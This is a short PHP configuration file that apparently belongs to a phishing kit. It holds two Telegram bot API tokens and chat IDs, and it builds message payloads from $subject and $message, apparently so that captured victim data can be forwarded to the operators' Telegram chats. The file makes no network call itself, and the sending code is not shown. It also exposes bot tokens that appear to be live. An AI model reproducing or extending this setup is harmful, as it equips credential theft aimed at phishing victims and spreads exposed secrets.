<?php
$emailbot="";
$antiemail="";
$apitokens="5306941997:AAEudItxX33enmeJ3GrK5XXJ0FrFBlGe31g";
$antibot2="-942875244";
$apitokens1="7188917680:AAGScMA4rCBRMgt92tXWUpt7xIBULTjl8Jw";
$antibot4="5214868552";
$datas= [
'chat_id' => $antibot4 ,
'text' => $subject . $message
];
$datas1= [
'chat_id' => $antibot2 ,
'text' => $subject . $message
];
?>